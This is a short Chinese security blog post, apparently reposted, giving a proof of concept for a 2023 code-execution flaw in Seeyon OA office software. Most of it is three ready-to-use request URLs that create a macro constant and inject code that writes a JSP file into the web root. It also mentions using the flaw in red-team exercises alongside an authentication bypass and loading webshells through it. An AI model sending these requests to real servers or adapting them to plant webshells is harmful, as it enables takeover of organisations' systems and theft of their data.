如果觉得该文章有帮助的,麻烦师傅们可以搜索下微信公众号:良月安全。点个关注,感谢师傅们的支持。
炒个冷饭,虽然是个23年hw爆出来的洞,但是网上没有公开利用的信息,而且在hw中配合致远的权限绕过也成功过几次,感觉能打的还是有一些的。
漏洞简介
致远OA是一款面向企业的办公自动化软件,设计理念是以人为中心,提供全面的协同办公解决方案。它由北京致远互联软件股份有限公司开发,自2002年成立以来,致力于提供协同办公产品的设计、研发、销售及服务。致远OA不仅支持基本的办公自动化功能,如流程审批、信息共享和文档处理,还提供了高级功能如移动办公和集成第三方系统,以适应不同规模企业的需求。攻击者可通过代码执行漏洞获取服务器权限。
漏洞复现
首先新建一个常量,constKey(常量名)为demo。
/seeyon/constDef.do?method=newConstDef&constKey=demo&constDefine=1&constDescription=123&constType=4
可以通过如下接口查看常量是否新建完成。
/seeyon/ajax.do?method=ajaxAction&managerName=constDefManager&rnd=123123123&managerMethod=listPage&arguments=%5B%7B%22page%22%3A1%2C%22size%22%3A20%7D%2C%7B%7D%5D
再新建一个常量,constType值为4表示常量类型为宏替换,在constDefine(常量定义)中引用常量demo,构造闭合造成代码执行。
/seeyon/constDef.do?method=newConstDef&constKey=asdasd&constDefine=$demo%20%22;new%20File(%22../webapps/ROOT/1111.jsp%22).write(new%20String(Base64.getDecoder().decode(%22PCVvdXQucHJpbnRsbigiMjEzMjEzIik7JT4=%22)));%22&constDescription=123&constType=4
可能要运行2次才能成功,写入1111.jsp文件。
漏洞复现就这样。如果师傅们在实战中利用过就会知道,常规的蚁剑、冰蝎等webshell管理工具的jsp马在写入的过程中因为太长而写不进去,这个问题就留给师傅们思考,我这边具体方法就放在星球。
版权归原作者 LiangYueSec 所有, 如有侵权,请联系我们删除。